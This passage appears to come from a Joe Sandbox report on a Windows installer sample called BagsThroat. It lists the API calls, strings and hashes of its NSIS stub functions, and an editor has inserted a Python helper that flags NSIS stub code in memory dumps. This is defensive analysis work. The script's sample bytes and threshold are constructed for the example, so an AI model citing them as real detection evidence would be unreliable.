                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                        • API String ID: 1641139501-220328614
                                        • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                        • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                        • API String ID: 3734993849-3206598305
                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                        Strings
                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID: created uninstaller: %d, "%s"
                                        • API String ID: 3294113728-3145124454
                                        • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                        • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                        Strings
                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                        • `G, xrefs: 0040246E
                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                        • API String ID: 1033533793-4193110038
                                        • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                        • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                        • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
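The log format strings the sandbox recovered from the functions above (WriteRegStr:, WriteReg: error creating key, [Rename] with the %s=%s / NUL pair written via GetShortPathNameW, created uninstaller:, Error registering DLL:, RMDir: RemoveDirectory invalid input, and the Exec: command= / Exec: success / Exec: failed createprocess strings that appear further down in this listing) are the NSIS installer stub's (exehead) own debug strings; that identification is this editor's, from the NSIS source, not a statement the report makes. The functions carrying them are generic installer code, so analyst time belongs on the dropped files and the injected payload instead. The script below is an added triage helper, not part of the Joe Sandbox report or of the sample: it scans a memory dump for those strings in both encodings the report shows (lstrlenW on the wide strings, lstrcpyA on [Rename]) and reports which NSIS instruction handlers are present. The instruction labels in the table and the SAMPLE_DUMP bytes are constructed for the example.

```python
"""Added triage helper: flag NSIS installer-stub functions in a memory dump.

Scans a dump for the NSIS exehead's log format strings (the ones the sandbox
report shows inside the dumped functions) and maps each hit to the NSIS
instruction handler it belongs to, so the stub can be set aside and analysis
focused on the payload it drops.
"""
from __future__ import annotations

import re

# Format strings emitted by the NSIS exehead, as listed in the report above.
# Value: the NSIS instruction whose handler contains the string (editor's
# mapping from the NSIS source; not something the report states).
NSIS_STUB_MARKERS: dict[str, str] = {
    'WriteRegStr: "%s\\%s" "%s"="%s"': "WriteRegStr",
    'WriteRegExpandStr: "%s\\%s" "%s"="%s"': "WriteRegExpandStr",
    'WriteRegDWORD: "%s\\%s" "%s"="0x%08x"': "WriteRegDWORD",
    'WriteRegBin: "%s\\%s" "%s"="%s"': "WriteRegBin",
    'WriteReg: error creating key "%s\\%s"': "WriteReg*",
    'WriteReg: error writing into "%s\\%s" "%s"': "WriteReg*",
    'Exec: command="%s"': "Exec/ExecWait",
    'Exec: success ("%s")': "Exec/ExecWait",
    'Exec: failed createprocess ("%s")': "Exec/ExecWait",
    'created uninstaller: %d, "%s"': "WriteUninstaller",
    "Error registering DLL: Could not load %s": "RegDLL/UnRegDLL",
    "Error registering DLL: Could not initialize OLE": "RegDLL/UnRegDLL",
    "Error registering DLL: %s not found in %s": "RegDLL/UnRegDLL",
    'RMDir: RemoveDirectory invalid input("")': "RMDir",
    "[Rename]": "Rename /REBOOTOK",
}


def find_nsis_markers(blob: bytes) -> list[tuple[int, str, str]]:
    """Return (offset, encoding, instruction) for every stub marker in blob.

    The report shows the wide strings passed to lstrlenW (UTF-16LE) and
    '[Rename]' handled with lstrcpyA (ANSI), so both encodings are searched.
    """
    hits: list[tuple[int, str, str]] = []
    for text, instr in NSIS_STUB_MARKERS.items():
        for enc in ("ascii", "utf-16-le"):
            needle = text.encode(enc)
            for m in re.finditer(re.escape(needle), blob):
                hits.append((m.start(), enc, instr))
    return sorted(hits)


def stub_instructions(blob: bytes) -> set[str]:
    """Distinct NSIS instruction handlers whose strings are present in blob."""
    return {instr for _, _, instr in find_nsis_markers(blob)}


def is_nsis_stub(blob: bytes, min_instructions: int = 3) -> bool:
    """Heuristic: strings from several distinct handlers => NSIS exehead code,
    not the payload.  Threshold is a constructed default, tune to taste."""
    return len(stub_instructions(blob)) >= min_instructions


# Constructed sample (not a real dump from the sample): a few of the report's
# strings in the encodings NSIS uses, separated by filler bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + 'WriteRegStr: "%s\\%s" "%s"="%s"'.encode("utf-16-le")
    + b"\x00" * 8
    + 'Exec: command="%s"'.encode("utf-16-le")
    + b"\xcc" * 8
    + b"[Rename]"
    + b"\x00" * 8
    + "Error registering DLL: Could not initialize OLE".encode("utf-16-le")
)

if __name__ == "__main__":
    for off, enc, instr in find_nsis_markers(SAMPLE_DUMP):
        print(f"0x{off:08x} {enc:9} {instr}")
    print("NSIS stub:", is_nsis_stub(SAMPLE_DUMP))
```

Run it against the .sdmp files listed under Memory Dump Source (read the file as bytes and pass it to find_nsis_markers); offsets are relative to the dump, so add the dump's base (0x400000 for the main module here) to compare with the ref: addresses in the report. A hit only says the handler code is present, not that the instruction ran; which registry keys or commands were actually used comes from the behavioural sections of the report, not from this scan.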
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                        • GetSysColor.USER32(00000000), ref: 00403E2C
                                        • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                        • SetBkMode.GDI32(?,?), ref: 00403E44
                                        • GetSysColor.USER32(?), ref: 00403E57
                                        • SetBkColor.GDI32(?,?), ref: 00403E67
                                        • DeleteObject.GDI32(?), ref: 00403E81
                                        • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                        • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                        • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                          • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                        Strings
                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                        • Exec: success ("%s"), xrefs: 00402263
                                        • Exec: command="%s", xrefs: 00402241
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                        • API String ID: 2014279497-3433828417
                                        • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                        • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                        • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                        • GetMessagePos.USER32 ref: 0040489D
                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                        • MulDiv.KERNEL32(00018200,00000064,0010FB6C), ref: 00403295
                                        • wsprintfW.USER32 ref: 004032A5
                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                        Strings
                                        • verifying installer: %d%%, xrefs: 0040329F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • GlobalFree.KERNEL32(00000000), ref: 00402387
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FreeGloballstrcpyn
                                        • String ID: 176$Exch: stack < %d elements$Pop: stack empty
                                        • API String ID: 1459762280-95732424
                                        • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                        • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                        • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                        • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Close$DeleteEnumOpen
                                        • String ID:
                                        • API String ID: 1912718029-0
